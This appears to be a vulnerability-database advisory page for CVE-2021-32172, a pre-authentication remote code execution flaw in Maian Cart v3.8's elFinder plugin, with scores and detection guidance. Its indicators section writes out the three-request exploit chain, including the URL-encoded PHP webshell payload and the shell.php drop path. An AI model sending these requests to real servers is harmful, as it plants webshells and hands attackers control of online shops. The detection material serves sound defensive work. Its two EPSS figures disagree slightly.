cbcvebase.
CVE-2021-32172
published 2021-10-07

CVE-2021-32172: Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.

PriorityP189critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
66.43%
99.2th percentile
Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.

Affected

1 ranges
VendorProductVersion rangeFixed in
maianscriptworldmaian_cart

Detection & IOCsextracted from sources · hover to see the quote

url/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw
url/admin/index.php?p=ajax-ops&op=elfinder
url/product-downloads/shell.php
path/product-downloads/shell.php
filenameshell.php
commandcmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E
commandGET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
commandcmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e
  • Detect unauthenticated GET requests to the elFinder endpoint with cmd=mkfile creating a .php file in the target=l1_Lw (root) directory — this is the first stage of the RCE exploit chain.
  • Detect unauthenticated POST requests to /admin/index.php?p=ajax-ops&op=elfinder with cmd=put in the body, which writes a PHP webshell payload (URL-encoded <?php system($_GET["cmd"]) ?>) to the newly created file.
  • Detect GET requests to /product-downloads/*.php — the exploit drops a webshell into this publicly accessible directory and executes it via HTTP GET with a ?cmd= parameter.
  • Alert on the presence of any .php file created under the product-downloads/ directory, as this path is not intended to serve executable PHP scripts.
  • The exploit uses X-Requested-With: XMLHttpRequest header in the POST write stage; correlate unauthenticated requests bearing this header to the elfinder op endpoint as a detection signal.
  • The exploit cleanup step issues a GET to /admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets[]=<hash> — monitor for unauthenticated rm commands on the elfinder endpoint as evidence of post-exploitation cleanup.
  • The full exploit chain requires exactly 3 unauthenticated HTTP requests (mkfile GET → put POST → shell GET); a sequence of these three request patterns from the same source IP is a high-confidence indicator of exploitation.
  • ·The elFinder endpoint is accessible without authentication (broken access control, CWE-862), meaning no session cookie or credential is required to trigger the exploit — authentication-based controls alone will not block this attack path.
  • ·The webshell is written to /product-downloads/ which is a publicly web-accessible directory; WAF rules should block PHP execution in this path in addition to blocking the write operation.
  • ·The EPSS score is 0.65463 (98.494th percentile), indicating this vulnerability is actively exploited in the wild and should be treated as high-priority for detection and patching.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.